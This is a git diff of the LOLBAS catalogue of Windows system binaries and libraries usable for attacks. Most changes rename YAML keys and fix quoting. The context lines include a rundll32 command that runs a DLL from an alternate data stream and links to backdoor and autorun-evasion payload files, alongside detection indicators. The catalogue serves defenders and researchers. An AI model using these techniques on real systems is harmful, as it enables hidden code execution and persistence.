-Code Sample: 
+Code_Sample: 
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
 Detection:
 - IOC: mshta.exe executing raw or obfuscated script within the command-line
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\msiexec.exe
  - Path: C:\Windows\SysWOW64\msiexec.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: msiexec.exe getting files from Internet
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\odbcconf.exe
  - Path: C:\Windows\SysWOW64\odbcconf.exe
-Code Sample: 
+Code_Sample: 
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
 Detection:
 - IOC:
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -28,9 +28,9 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\pcalua.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC:
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -12,9 +12,9 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Presentationhost.exe
  - Path: C:\Windows\SysWOW64\Presentationhost.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -28,10 +28,10 @@ Commands:
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\print.exe
  - Path: C:\Windows\SysWOW64\print.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Print.exe getting files from internet
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\reg.exe
  - Path: C:\Windows\SysWOW64\reg.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: reg.exe writing to an ADS
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -20,12 +20,12 @@ Commands:
    MitreID: T1121
    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: regasm.exe executing dll file
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\regedit.exe
  - Path: C:\Windows\SysWOW64\regedit.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: regedit.exe reading and writing to alternate data stream
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Register-cimprovider.exe
  - Path: C:\Windows\SysWOW64\Register-cimprovider.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1121
    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\regsvcs.exe
  - Path: C:\Windows\SysWOW64\regsvcs.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1117
    MitreLink: https://attack.mitre.org/wiki/Technique/T1117
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: regsvr32.exe getting files from Internet
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\replace.exe
  - Path: C:\Windows\SysWOW64\replace.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Replace.exe getting files from remote server
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1003
    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\rpcping.exe
  - Path: C:\Windows\SysWOW64\rpcping.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -47,7 +47,7 @@ Commands:
  - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
    Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
    Usecase: Execute code from alternate data stream
-    Category: Alternate data streams
+    Category: ADS
    Privileges: User
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@ -60,10 +60,10 @@ Commands:
    MitreID: 
    MitreLink: 
    OperatingSystem: Windows 10 (and likely previous versions)
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\rundll32.exe
  - Path: C:\Windows\SysWOW64\rundll32.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC:
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\runonce.exe
  - Path: C:\Windows\SysWOW64\runonce.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
  - Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Event 4014 - Powershell logging
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\sc.exe
  - Path: C:\Windows\SysWOW64\sc.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Services that gets created
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1053
    MitreLink: https://attack.mitre.org/wiki/Technique/T1053
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\schtasks.exe
  - Path: c:\windows\syswow64\schtasks.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Services that gets created
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\scriptrunner.exe
  - Path: C:\Windows\SysWOW64\scriptrunner.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Scriptrunner.exe should not be in use unless App-v is deployed
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\verclsid.exe
  - Path: C:\Windows\SysWOW64\verclsid.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Program Files\Windows Mail\wab.exe
  - Path: C:\Program Files (x86)\Windows Mail\wab.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: WAB.exe should normally never be used
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -68,10 +68,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\wmic.exe
  - Path: C:\Windows\SysWOW64\wmic.exe
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Wmic getting scripts from remote system
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1096
    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\wscript.exe
  - Path: C:\Windows\SysWOW64\wscript.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: Wscript.exe executing code from alternate data streams
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\xwizard.exe
  - Path: C:\Windows\SysWOW64\xwizard.exe
-Code Sample: 
+Code_Sample: 
 - Code:
 Detection:
 - IOC: 
@ -38,5 +38,5 @@ Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
  - Person: harr0ey
-    Handle: @harr0ey
+    Handle: '@harr0ey'
 ---
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@ -42,10 +42,10 @@ Commands:
    Privileges: User
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\advpack.dll
  - Path: c:\windows\syswow64\advpack.dll
-Code Sample:
+Code_Sample:
  - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
  - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
 Detection:
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@ -42,10 +42,10 @@ Commands:
    Privileges: User
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\ieadvpack.dll
  - Path: c:\windows\syswow64\ieadvpack.dll
-Code Sample:
+Code_Sample:
  - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
  - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
 Detection:
--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\ieframe.dll
  - Path: c:\windows\syswow64\ieframe.dll
-Code Sample:
+Code_Sample:
  - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
 Detection:
  - IOC:
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\mshtml.dll
  - Path: c:\windows\syswow64\mshtml.dll
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\pcwutl.dll
  - Path: c:\windows\syswow64\pcwutl.dll
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
@ -25,3 +25,4 @@ Resources:
 Acknowledgement:
  - Person: Matt harr0ey
    Handle: '@harr0ey'
+---
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1085
    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\setupapi.dll
  - Path: c:\windows\syswow64\setupapi.dll
-Code Sample:
+Code_Sample:
  - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
  - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
  - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
--- a/yml/OSLibraries/Shdocvw.yml
+++ b/yml/OSLibraries/Shdocvw.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\shdocvw.dll
  - Path: c:\windows\syswow64\shdocvw.dll
-Code Sample:
+Code_Sample:
  - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
 Detection:
  - IOC:
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@ -26,10 +26,10 @@ Commands:
    Privileges: User
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\shell32.dll
  - Path: c:\windows\syswow64\shell32.dll
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1085
    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\syssetup.dll
  - Path: c:\windows\syswow64\syssetup.dll
-Code Sample:
+Code_Sample:
  - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
  - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
  - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
--- a/yml/OSLibraries/Url.yml
+++ b/yml/OSLibraries/Url.yml
@ -52,10 +52,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\url.dll
  - Path: c:\windows\syswow64\url.dll
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@ -20,10 +20,10 @@ Commands:
    MitreID: T1085
    MItreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: c:\windows\system32\zipfldr.dll
  - Path: c:\windows\syswow64\zipfldr.dll
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@ -12,11 +12,11 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC:
--- a/yml/OSScripts/Cl_invocation.yml
+++ b/yml/OSScripts/Cl_invocation.yml
@ -12,11 +12,11 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
  - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC:
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@ -20,9 +20,9 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\manage-bde.wsf
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC: Manage-bde.wsf should normally not be invoked by a user
--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
  - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
-Code Sample: 
+Code_Sample: 
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
 Detection:
  - IOC:
--- a/yml/OSScripts/Slmgr.yml
+++ b/yml/OSScripts/Slmgr.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\slmgr.vbs
  - Path: C:\Windows\SysWOW64\slmgr.vbs
-Code Sample: 
+Code_Sample: 
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
 Detection:
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
@ -12,9 +12,9 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC:
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@ -36,10 +36,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: C:\Windows\System32\winrm.vbs
  - Path: C:\Windows\SysWOW64\winrm.vbs
-Code Sample: 
+Code_Sample: 
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
 Detection:
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1216
    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
    OperatingSystem: Windows 10
-Full Path:
+Full_Path:
  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
-Code Sample: 
+Code_Sample: 
  - Code:
 Detection:
  - IOC:
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@ -28,10 +28,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 10 w/Office 2016
-Full Path:
+Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@ -52,9 +52,9 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: No fixed path
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@ -12,10 +12,10 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
-Full Path:
+Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
-Code Sample:
+Code_Sample:
  - Code:
 Detection:
  - IOC:
--- a/Show More
+++ b/Show More